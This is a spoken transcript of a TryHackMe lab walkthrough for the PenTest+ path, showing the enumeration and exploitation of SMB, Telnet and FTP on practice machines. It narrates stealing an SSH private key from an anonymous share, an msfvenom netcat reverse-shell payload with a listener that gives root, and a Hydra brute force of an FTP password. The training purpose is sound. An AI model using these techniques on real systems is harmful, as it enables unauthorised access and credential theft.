What's up YouTube, welcome back. In today's video we're going to continue the CompTIA PenTest Plus learning path on TryHackMe. We're still in the network-based vulnerability section. In today's room we're going to cover network services. We're going to learn and then enumerate and exploit a variety of network services and misconfigurations. Let's go ahead and get started. So before we get started, let's go ahead and jump to task number 3 and just start this machine. Just because it takes a few minutes to start. So while that does its thing, we'll go ahead and knock out tasks 1 and 2. Task number 1. So this room will explore common network service vulnerabilities and misconfigurations, but in order to do that, we'll need to do a few things first. So like the basic knowledge of Linux and how to navigate the Linux file system is required for this room. So you could check out this Linux Fundamentals room. There's 2 or 3. So let's go ahead and complete. And on to task number 2, understanding SMB. So what is SMB? SMB, or Server Message Block Protocol, is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on the network. And here is the source for that. Servers make file systems and other resources like printers, namepipes, APIs available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on those servers. The SMB protocol is known as a response request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using the TCP/IP model, or clients connect to servers using TCP/IP. Actually, NetBIOS over TCP as specified in the RFC 1001 or RFC 1002 also. So how does SMB work? So the client sends an SMB request to the server, and then the server responds with an SMB response. Once they have established a connection, clients can then send commands, or SMB commands, to the server that allow them to access shares, open files, read and write files, and generally do all the sorts of things that you want to do with the file system. However, in the case of SMB, these things are done over the network. And what runs SMB? So Microsoft Windows operating systems since Windows 95 have included client and server SMB protocol support. Samba, an open source server that supports the SMB protocol, was released for Unix systems. So on to the questions. What does SMB stand for? Server Message Block. What type of protocol is SMB? SMB is a response request protocol. And what do clients connect to the server using? That would be TCP/IP. And what systems does Samba run on? Unix or Linux? On to task number 3. So task number 3, enumerating SMB. Let's get started. So before we begin, make sure that we deploy the machine, which we did. And then we're going to enumerate the process by gathering information on the target in order to find potential attack vectors and aid in the exploitation. So for SMB, there are typically SMB drives on the server that can be connected to and used to view or transfer files. SMB can often be a great starting point for an attacker looking to discover sensitive information, and you'd be surprised what is sometimes included on those shares. Port scanning. The first step of enumeration is to conduct a port scan to find out as much information as you can about the services, applications, structure, and even operating systems of the target machine. And then we'll jump into Enum4Linux. Enum4Linux is a tool used to enumerate SMB shares on both Windows and Linux systems. It's basically a wrapper around the tools in the Samba package and makes it easy to quickly extract information from the target pertaining to SMB. It's installed by default on Parrot and Kali. However, you need to install it. You can do it using this GitHub link. So the syntax of Enum4Linux is pretty simple. It's Enum4Linux, whatever option you want, such as these right here for an example, and then the IP. So on to the questions. So conduct an nmap scan. Let's just go ahead and run nmap-a-t4-PN and then the target. 10.10.171.214. Conduct an nmap scan of your choosing. How many ports are there? Okay, now that this is loaded, how many ports are open? So as we see here, there's 22, 139, oops, and then 445. So there'll be 3 ports open. And what ports is SMB running on? It'll be 139 and 445. Let's get started with Enum4Linux. Conduct a full basic enumeration for starters, and then what is the work group name? So as we can see here, these are the different tags for Enum for Linux, and we'll want to do the full basic enumeration using the -a tag. So let's go ahead and do enum for Linux, the -a 10.10.171.214. As we can see here in the enumerating workgroup domains, the workgroup that it's in is going to be workgroup. What comes up as the name of the machine? So if you scroll down to the OS information, you'll see Polo SMB. That'll be the name of the actual machine. What operating system version is running? We see OS version here. It'll be 6.1. And then what share sticks out as something we might want to investigate? Scroll a little bit further, and then you'll see the share enumeration. Net logon, that's usually on Windows by default. So is print and IPC. So the one that sticks out is going to be the profiles or user profiles. And then on to task number 4, exploiting SMB. So while there are vulnerabilities such as the CVE 2017-7494 that can allow remote code execution by exploiting SMB, you're more likely to encounter a situation where the best way to get into a system is due to misconfigurations in the system. In this case, we're going to be exploiting the anonymous SMB share access. It's a misconfiguration that can allow us to gain information that'll lead to a shell. So for our enumeration stage, we know that the SMB share location, which is profiles, and the name of the interesting SMB share, which is profiles, and then SMB client. Because we're trying to access an SMB share, we need a client to access resources on servers. So we will be using SMB client, which is part of the default Samba suite. While it is available by default on Kali and Parrot, if you need to install it, you can find the documentation in this link. And then this is an example here showing that we can remotely access SMB share using this syntax. We can also follow the syntax with these tags, the -U to specify the user, and then the -P to specify the port. On to the questions. What would be the correct syntax to access an SMB share called secret as user suite or suite on a machine with the IP of 10.10.10.2 on the default port, which would be 445? So we'll go ahead and do SMB client, and then 10.10.10.2, and then secret as the user suite or suite, and then port 445. Great, now that we've got a hang of the syntax, let's have a go at trying to exploit this vulnerability. You have a list of users, the name of the share, which is SMB, and a suspected vulnerability. Let's see if our interesting share has been misconfigured to allow anonymous access. It doesn't require authentication to view the files, but we can easily do this by using the username anonymous. So let's go ahead and clear this out, and then do a quick SMB client 171. So it'll be 10.10.171.214 profiles, and then the user anonymous. So now we're in. So we do have anonymous access. Go ahead and hit yes for that. Now it's going to say have a look around for any interesting documents that could contain valuable information. So doing a quick ls. This is everything within this SMB folder, within this profiles share. So this looks interesting, working from home information. So let's go do a quick more working from home. Let's go ahead and put that in quotes. John Cactus. And then this is just basically saying, so we're aware due to the current pandemic, most of Polo Inc. has insisted that employees should work from home, and they're saying our account has been enabled with SSH access to the main server. If there are any problems, please contact IT, and then that is the email. Regards, James, the department manager. So who does the profile folder belong to? we're going to go ahead and say John Cactus. What service has been configured to allow him to work from home? SSH. Now we know this, what directory on the share could we look into? So since John Cactus is able to access this server remotely, we'll go into the SSH folder. And then it shows us the ID_RSA and the .pub. So this is the private key and this is the public key, and then the authorized keys. What directory on the share shall we look into? The .ssh. This directory contains authentication keys that allow a user to authenticate themselves and then access a server. Which of these keys is most useful? That'll be ID_RSA. Download this file to your local system and change the permission to 600 using chmod 600 and the file name. So do git mget ID_RSA, get file, yes. And we got the file, and if we do an ls, we see the file there, change mod. And now we can check the permissions of that file, and it only has read write. Now use the information you have already gathered to work out the username of the account, and then use the service and key to log into the server. We'll also have to go ahead and grab the public key too, so do mwget ID_RSA.pub, hit yes, and then exit back out of that. So now we see that we do have both files, and then to find the username, we can just read out the public key file, and we see that it's Cactus. So that will be our username. We'll do an SSH ID_RSA -I indicates the file that the RSA key, the private key that we want to authenticate with, and then Cactus is the user at 10.10.171.214. Hit yes to continue connecting. And we are in, so go ahead and do a quick ls. And then what is the SMB text flag? Go ahead and cat that out. And there is our flag. On to task number 5, understanding Telnet. So Telnet is an application protocol which allows you, with the use of Telnet client, to connect to and execute commands on a remote machine that's hosting a Telnet server. The Telnet client will establish a connection with the server. The client will then become a virtual terminal, allowing you to interact with the remote host. Replacement. So Telnet sends all messages in clear text and has no specific security mechanisms. So Telnet has been replaced by SSH because of that, because SSH encrypts everything. So how does Telnet work? So the user connects to the server by using the Telnet protocol, which means entering Telnet into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to the Telnet server with the following syntax: Telnet, the IP, and the port. So what is Telnet? Telnet is an application protocol. What was slowly replaced by Telnet? That'll be SSH. How would you connect to a Telnet server with the IP 10.10.10.3 on port 23? That'll be Telnet 10.10.10.3 and port 23. The lack of what means that all Telnet communication is in plain text. Lack of encryption. On to task number 6, enumerating Telnet. So let's go ahead and start this machine. But before we do that, let's terminate this one. And then start this one. Before we begin, let's make sure to deploy the room. We just did that, so it's going to take a minute to spin up. So enumeration. We've already seen how key enumeration can be in exploiting a misconfigured network service. However, vulnerabilities that could be potentially trivial to exploit don't always jump out to us. For that reason, especially when it comes to enumerating network services, we need to be thorough in our method. And port scanning. So the way we're always going to start is by doing a port scan to find out as much information as we can about the services. Enumerating network services, we need to be thorough in our method. Let's start out with the same that we usually do, a port scan to find out as much information as we can about the services, application structure, and operating system of the target machine, so we can do a scan with Nmap. And then output, let's see what's going on. All right, so let's do a quick nmap-a-pn-t4-p-1010 169.27. And first question, how many ports are open on the target machine? So until this loads, we'll go ahead and pause it here. Okay, so the scan finally finished. How many ports are open on the target machine? As we can see from this scan output, there's only one port. That's 8012. What port is this? The port is unassigned, but still lists the protocol it's using. What protocol is this? It is using the TCP protocol. Now, rerun Nmap scan without the P tag. How many ports show as open? So you can do the same command, but then get rid of the -p dash. And then hit enter. It shouldn't return any port just because 8012 is a non-standard port. So we'll go ahead and let that run. From here we see that it shows 0 ports. So how many ports show up? 0. Here we see that by assigning Telnet to a non-standard port, it is not part of the common ports list or top 1000 ports that Nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage. Complete. Based on the title returned to us, what do we think the port could be used for? It was a backdoor. Who could it belong to? The username that we saw was Skitty. And go ahead and complete that, because always keep a note of information you find during the enumeration stage. On to task number 7. The types of Telnet exploit. Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption to send all communication over plain text, and for the most part has poor access control. There are CVEs for Telnet client and server systems. However, so when exploited, you can check for those over here on CVE details and cve.miter.org. A CVE, short for Common Vulnerabilities and Exposure, is a list of publicly disclosed computer security flaws. When someone refers to a CVE, they usually mean the CVE ID number assigned to the security flaw or a security flaw. You're more likely to find a misconfiguration in how Telnet has been configured or is operating that will allow you to exploit it. So our method breakdown. From our enumeration stage, we know that it is a poorly hidden Telnet service running on this machine because it's running on port 8012. The service itself is named backdoor with the possible username Skitty, since it said Skitty's backdoor. Using this information, try accessing this Telnet port and using that as a foothold to get a full reverse shell on the machine. So let's go ahead and connect to Telnet. Connect via Telnet to the client. 169.27 and 8012. And it says Skitty's backdoor. So what is a reverse shell? A shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device. A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. So this is kind of an idea. So the attacker IP is sitting at 1.25 with the listener port 4444, and then the victim IP at 1.13. So the victim, which is this guy right here, the 1.13, connects to the attacker that's listening on port 444. So the attacking machine has a listening port on which it receives a connection, resulting in code or command execution being achieved. So on to the questions. Let's try and connect to this Telnet port. Go ahead and hit complete. We just connected to it. It's an open Telnet connection. What welcome message do we receive? So we see Skitty's backdoor. Let's try executing some commands. Do we get a return on any input we enter into the Telnet session? So let's try doing help. So let's go ahead and try doing a run. Doesn't look like we're getting any input on this. So let's go ahead and hit no. Looks like it's just sitting there. So let's check to see if what we're typing is being executed as a system command. So to start a TCP dump listener on your local machine, we can try using this command since we're connected via an open VPN connection, or you can use the attack box or the one for the attack box. So let's go ahead and split our terminal, then do TCP dump. Let's go ahead and do sudo TCP dump. IP proto //ICMP -I and then ton0, which is our tunnel adapter. Go ahead and hit enter. Type in your password. This starts the TCP dump listener, specifically listen for ICMP traffic, which ping operates on. Complete. Now use the command ping local THM or your TryHackMe IP, and then count 1 through the Telnet session to see if we're able to execute system commands. Do a quick help. So to get our tunnel 0 IP, we can just do a quick if config tunnel 0, and then we see our IPs 10.13.12.138. So we can do a quick run ping 10.13.12.138 with the count as being 1. And then we see we get a echo request and an echo reply populated here. So did we receive any pings? Yes. Great. That means that we're able to execute system commands and that we're able to reach out to the local machine. Now from here we can have some fun and exploit this. So we're going to generate a reverse shell payload using MSF Venom. This will generate and encode a netcat reverse shell for us. So this is a syntax that we can use. Go ahead and Control C because we no longer need this. And then just do a quick, let me go back to my TryHackMe directory. So I'll do a ms venom. Let's do sudo msf venom hp/cmd/unix/reverse_netcat. So this is the payload we're using. And then for lhost, we're going to use the tunnel 0 or our local tunnel 0 adapter IP, which will be the OpenVPN IP to connect to our TryHackMe machine. And then the L port equals 4444, and then R, which will export the payload in a raw format. And all the details can be listed here. The -P is the payload, lhost is our local host IP, L port is the local port to listen on, and then R is the export. We'll export the payload in a raw format. Now, what word does the generated payload start with? It'll be this. So this is the entire payload right here. So this will be the word that it starts with. Now we're nearly there. Now all we need to do is start a netcat listener on our local machine. We can do this by using netcat-lvp in the listening port. So back to our terminal. Let's do netcat-lvp 4444, hit enter. What would the command look like for the listening port we selected on our payload? It'll look like what we just typed, netcat-lvp 4444. Now that's running, we need to copy and paste our MSF Venom payload into the Telnet session and run it as a command. Hopefully this will give us a shell on the target machine. So we can just copy this whole command right here and then do a .run, all capital, and then paste your payload and then hit enter. And as we can see here, we get a connection back. Who am I? We are root. And then that shows that we just got root. So now we are a root user on the target machine. We can do an if config to see the IP or maybe an IPA. And we can see here that we're 10.10.169.27. So we are in fact root on the target system. Let's go ahead and cat the flag and then copy that. On to task number 8, understanding FTP. Before we jump to task number 8, let's quickly jump over to task 9 and just start this machine. Great, back to task number 8. So what is FTP? FTP, or the File Transfer Protocol, is, as the name suggests, it's a protocol used to allow remote transfer of files over a network. It uses a client-server model to do this, and as we'll come on to later, relays commands and data in a very efficient way. So how does FTP work? The FTP operates using 2 channels, a command, sometimes called the control channel, and a data channel. So as their name implies, the command channel is used for transmitting commands as well as replies to those commands, while the data channel is used only for transferring data. FTP operates using a client-server protocol. The client initiates a connection with the server, and then the server validates whatever login credentials are provided and then opens the session. While the session is open, the client may execute FTP commands on the server, active versus passive. The FTP server may support either active or passive connections or both. An active FTP connection is when the client opens a port and listens, so the server is required to actively connect to it. The passive FTP connection is when the server opens a port and listens passively and the client connects to it. So the separation of command information and data into separate channels is a way of being able to sync commands to the server without having to wait for the current data transfer to finish. If both channels were interlinked, you could only enter commands in between data transfers, which wouldn't be efficient for either large file transfers or slow internet connections. And then you can learn more by going over here. On to the question. So what communication model does the FTP use? It'll use the client-server communication model. What is the standard FTP port? 21. How many modes of FTP connections are there? 2. On to task number 9, enumerating FTP. Before we begin to deploy the machine, which we did, so enumeration. By now, I don't think I need to explain any further how enumeration is key when attacking network services. You should by now have enough experience with Nmap to be able to do a port scan effectively. So method. We're going to be exploiting an anonymous FTP login to see what files we can access and if they contain any information that might allow us to pop a shell on the system. This is a common pathway in CTF challenges and mimics a real-life careless implementation of FTP servers. So real quick, let's just do an Nmap scan of the target machine. While that's running. So resources. As we're going to be logging into an FTP server, we'll need to make sure an FTP client is installed on the system. There should be one installed by default on most Linux operating systems such as Kali or Parrot. You can test it by typing the FTP into the console. So for example, if we split our screen real quick, we do FTP and we see we have the FTP client on our end. Alternative enumeration methods. It's worth noting that some vulnerable versions of n.ftpd and some other FTP server variants return different responses to the cwd command for home directories which exist and those that don't. This can be exploited because you can issue cwd commands before authentication, and if there's a home directory, there's more likely a user account to go with it. While this bug is found mainly within legacy systems, it's worth knowing about as a way to exploit FTP. So run an Nmap scan on of your choice, which we are doing right now. Just waiting for that to finish. How many ports are open on the target machine? So while this finishes, we'll go ahead and pause it. Okay, so our Nmap scan has finally finished, and it detected port 21, the FTP server, and the version of the service. So how many ports are open on the target machine? 1. Supposedly it's supposed to be 2, but I don't see port 80. It's supposed to show port 80. It took about 15 minutes to run, so I'm just gonna go ahead and pretend that the port 80 is on here. What port is FTP running on? It's going to be running on port 21. What variant of FTP is running on it is going to be VSFTPD. Now that we know what type of FTP server we're dealing with, we can check to see if we're able to log in anonymously to the FTP servers. We can do this by using the FTP and the IP command and then entering anonymous with no password when prompted. So let's go ahead and clear that out. And we can also see here that anonymous FTP logins allowed and that there's a public notice txt file that might be useful. So let's go ahead and do FTP 10.10.193.186 and then we type anonymous for the name and then password, just hit enter, and we are in. Do a quick ls. We see this public notice.txt file, so let's just go ahead and see if we can get that. and then hit exit. Let's go ahead and cat that out. So this message from system administrators: hello, I hope everyone is aware that the FTP server will not be available over the weekend. We'll be carrying out routine system maintenance. Backups will be made to my account, so I recommend encrypting any sensitive data. Cheers, Mike. So let's go ahead and answer the next question, saying what is the file found in the directory? That'll be this one. So what do we think a possible username could be? It may be Mike. Great, now we got details about the FTP server and crucially a possible username. Let's see what we can do with that. So on to task number 10. Types of FTP exploit. Similarly to Telnet, when using FTP, both the command and data channels are encrypted. Any data sent over these channels can be intercepted and read. With data from FTP being sent in plain text, if a man in the middle attack took place, an attacker could reveal anything sent through this protocol, such as passwords. An article written by J.S. Cape, it's hyperlinked, demonstrates and explains this process using ARP poisoning to trick a victim into sending sensitive information to an attacker rather than a legitimate source. So the method breakdown. From our enumeration stage, we know there's an FTP server running on this machine and we have a possible username. Using this information, let's try to brute force the password of the FTP server. So we're going to use Hydra, which is a fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 protocols, including Telnet, RDP, SSH, FTP, and so on. So the syntax for the command we're going to be used is this syntax right here, Hydra-T, which is going to be the threads or the number of parallel connections per target, which will be 4, -L, which is the user, -P, which is specifying the password list, -VV for verbosity, the target IP, and the protocol that we're attacking. So what is the password for the user Mike? Go ahead and do Hydra-T for setting the parallel connection to 4, and then -L to specify Mike, -P, and then specify the user, share word list rocku.txt, and then set verbosity, the target IP 193.186, and then FTP, which is the protocol we're going to brute force. So while that's running, let's see if I can find a password. And I found a very simple password. Let's go ahead and see if that's right. And that is the password. Now let's connect to the FTP server using FTP IP and then entering the new credentials that we just found. So FTP 10.10.193.186, saying that connection is refused. Maybe because I put in the wrong IP. Sorry guys, it's getting late. 186, hit enter, and then enter the mic as the username and then password for password. And we are now in, and now we have an FTP directory and an FTP text file available to us. So what is ftp.txt? Well, let's go ahead and get that. ftp.txt. Let's go ahead and cd to the FTP directory, see what's in there. There's the future backup. Don't really need that. And then let's go ahead and cat the FTP, and there's our flag. And on to task number 11. This is just giving us some further reading if you want to touch up on any of this that we just went over. So go ahead and complete, and that'll be it. Thank you for watching, and we'll see you in the next video.